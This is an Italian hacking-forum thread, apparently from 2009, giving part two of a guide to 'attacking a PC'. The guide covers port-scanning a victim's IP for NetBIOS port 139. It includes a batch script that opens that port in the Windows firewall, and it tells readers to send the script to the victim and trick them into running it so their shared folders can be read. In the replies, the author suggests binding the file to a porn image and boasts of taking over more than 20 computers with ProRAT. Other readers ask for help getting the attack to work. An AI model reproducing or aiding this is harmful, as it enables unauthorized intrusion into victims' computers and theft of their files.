Attaccare Un pc (parte 2)

« Older   Newer »
 
  Share  
.
  1. -Gamemaster-
        Like  
     
    .

    User deleted


    Dopo avere trovato l'IP della nostra vittima, come descritto nella scorsa guida, è arrivato il momento di sferrare l'attacco vero e proprio.
    Uno dei metodi + efficaci è quello di utilizzare il netbios, di default abilitato su tutti gli o.s. Windows
    Vediamo un po' come sfruttarlo

    Come sempre sottolineo di provare tutto su vostri PC
    1)Scarichiamo innanzitutto un utilissimo programma per tutti gli hacker, un port scanner (un programma che ci permette di sapere le porte aperte in un determinato IP), in questo caso la scelta cade su advanced port scanner: http://www.gold-software.com/download6744.html
    2)Installiamo il programma e avviamolo
    3)Inseriamo l'IP della vittima precedentemente trovato e premiamo scan
    4)Aspettiamo il responso...
    5)Se nell'elenco delle porte aperte è presente la 139 (o comunque una porta che riporta la dicitura "netbios") siamo a cavallo...la vittima non l'ha chiusa e il suo PC è molto vulnerabile.
    --------------------------------
    Ma se la porta 139 non è aperta...

    1)Aprire blocco note;
    2)Scrivere:

    CODICE
    @echo off
    netsh firewall add portopening tcp 139
    netsh firewall add portopening udp 139
    netsh %­SYSTEMDRIVE%


    3)Salvare come "nomekevolete.bat" (virgolette escluse)
    4)Inviare il file alla vittima e trovare il modo di farglielo aprire
    ----------------------------------------------------------------
    6)Non ci rimane che aprire explorer e inserire nella barra degli indirizzi "\IP_DELLA_VITTIMA" (senza virgolette) e dare INVIO. (es. "\88.168.25.2")
    7)Tutte le cartelle condivise dal PC saranno totalmente accessibili da voi

    Nella prossima parte vedremo addirittura come sfruttare questa vulnerabilità per attacchi ancora più efficaci...
    Stay tuned!
     
    .
  2. GDM1
        Like  
     
    .

    User deleted


    Non avrà mai aperta la 139!!! E se è furbo non aprirà mai il bat che gli inviamo!!
     
    .
  3. @N63
        Like  
     
    .

    User deleted


    CITAZIONE (GDM1 @ 2/8/2009, 18:59)
    Non avrà mai aperta la 139!!! E se è furbo non aprirà mai il bat che gli inviamo!!

    OTTIMISTA il ragazzo molto ottimista
    XD
     
    .
  4. -Gamemaster-
        Like  
     
    .

    User deleted


    CITAZIONE (GDM1 @ 2/8/2009, 18:59)
    Non avrà mai aperta la 139!!! E se è furbo non aprirà mai il bat che gli inviamo!!

    social engineering.... io cosi mi sono impossessato di oltre 20 computer.. in quel caso utilizzavo PRORAT.. comunque il bat puoi accoppiarlo con qualche immagine.... phorno se vogliamo xD con un comune accoppiatore di file
     
    .
  5. megas93
        Like  
     
    .

    User deleted


    n63 questa storia ti ricorda qualcosa? a me si...............
     
    .
  6. Depa Marco
        Like  
     
    .

    User deleted


    io sono riuscito a fargli aprire tt col social...
    Grande Game!!
     
    .
  7. megas93
        Like  
     
    .

    User deleted


    anche lui ci e riuscito................
     
    .
  8. Depa Marco
        Like  
     
    .

    User deleted


    CITAZIONE (megas93 @ 11/8/2009, 17:10)
    anche lui ci e riuscito................

    beh, nn a caso è chiamato "il mago del social"...
    rasseganti megas... accetta la sconfitta... ahahaha t'ha fregato!!!
     
    .
  9. -Gamemaster-
        Like  
     
    .

    User deleted


    CITAZIONE (Depa Marco @ 12/8/2009, 09:06)
    CITAZIONE (megas93 @ 11/8/2009, 17:10)
    anche lui ci e riuscito................

    beh, nn a caso è chiamato "il mago del social"...
    rasseganti megas... accetta la sconfitta... ahahaha t'ha fregato!!!

    che bel soprannome xD comunque ho giokato xD con megas per vedere se la sua protezione era buona..invece faceva schifo ed adesso e' protetto ;)
     
    .
  10. MS-DOS
        Like  
     
    .

    User deleted


    Carina come guida. Anche spiegata bene. Ma lo volete un consiglio ? Usate le Shell !!! :)
     
    .
  11. -Gamemaster-
        Like  
     
    .

    User deleted


    Grazie ;) ma la stanno copiando da tutto il mondo questa guida xD
     
    .
  12. vercingetorixe
        Like  
     
    .

    User deleted


    ciao scusate l' ignoranza sono nuovo ma l' ip della vittima dove deve essere inserito?
     
    .
  13. Dave933
        Like  
     
    .

    User deleted


    Ciao a tutti...ho fatto tutto come segue, ma quando vado ad inserire l'indirizzo ip sulla barra degli indirizzi mi da errori...eppure la porta 139 è aperta...
     
    .
12 replies since 2/8/2009, 17:24   2256 views
  Share  
.